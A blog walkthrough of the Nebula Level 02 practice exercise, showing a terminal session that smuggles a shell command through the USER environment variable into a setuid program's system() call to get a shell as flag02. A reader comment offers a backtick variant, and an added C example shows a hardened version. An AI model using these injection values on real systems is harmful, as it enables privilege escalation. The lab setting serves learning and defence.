Exploit Exercises Nebula Level 02

After completing Nebula Level 01, I decided to quickly run into Nebula Level 02. After quickly looking at the code they have provided, it became evident that Level01 and Level02 were very similar, differing only in the way you launch the exploit. Level01 was exploited by having a script named after the binary that was being called. In this exploit you use the USER variable and assign the code you want to run to it.

Here is what I did to accomplish this exploit:

flag02@nebula:~$ pwd
/home/level02
level02@nebula:~$ chmod g+x exploit 
level02@nebula:~$ USER='-e "I am going to get the flag"; ~/exploit'
level02@nebula:~$ /home/flag02/flag02 
about to call system("/bin/echo -e "I am going to get the flag"; ~/exploit is cool")
I am going to get the flag
flag02@nebula:~$ getflag 
You have successfully executed getflag on a target account
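The output above shows flag02 pasting USER into a string that is handed to system(). A hardened counterpart follows as an added example; it is not code from this post or from the Nebula project. The function names are made up for illustration, and it assumes /bin/echo exists.

```c
#include <pwd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allow-list check: letters, digits, '.', '_' and '-' only, at most 32 bytes,
 * and no leading '-', so the value can never be read as an option. */
int is_safe_username(const char *s)
{
    static const char ok[] = "abcdefghijklmnopqrstuvwxyz"
                             "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._-";
    size_t n;
    if (s == NULL || s[0] == '\0' || s[0] == '-')
        return 0;
    n = strlen(s);
    return n <= 32 && strspn(s, ok) == n;
}

/* Look the name up from the real UID instead of trusting the
 * caller-controlled USER environment variable. NULL if there is no entry. */
const char *trusted_username(void)
{
    struct passwd *pw = getpwuid(getuid());
    return pw ? pw->pw_name : NULL;
}

/* Print "<user> is cool" without a shell: execve() receives argv as-is, so
 * ';', quotes and backticks are plain bytes. Returns echo's exit status, or
 * -1 if the name is rejected or the child could not be run. */
int greet(const char *user)
{
    char *const argv[] = { "echo", (char *)user, "is", "cool", NULL };
    char *const envp[] = { "PATH=/bin:/usr/bin", NULL }; /* fixed environment */
    int status;
    pid_t pid;

    if (!is_safe_username(user) || (pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        execve("/bin/echo", argv, envp);
        _exit(127); /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void) { return greet(trusted_username()) == 0 ? 0 : 1; }
```

A setuid program built this way never lets the environment reach a shell: the name comes from the password database, and the USER values used on this page are rejected by the allow-list before anything is executed.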

I’m now going to move on to Nebula Level 03, when I get a chance.

UPDATE:
Note: Not sure why the cat of exploit didn’t show (probably issues with wp-syntax and my theme), but exploit was just a script with:
#!/bin/bash
/bin/bash

About ben.kevan

I am ben kevan.. Well yeah.. that's about it.

1 Comment to “Exploit Exercises Nebula Level 02”

  1. USER='`/bin/getflag`'
    ./flag02
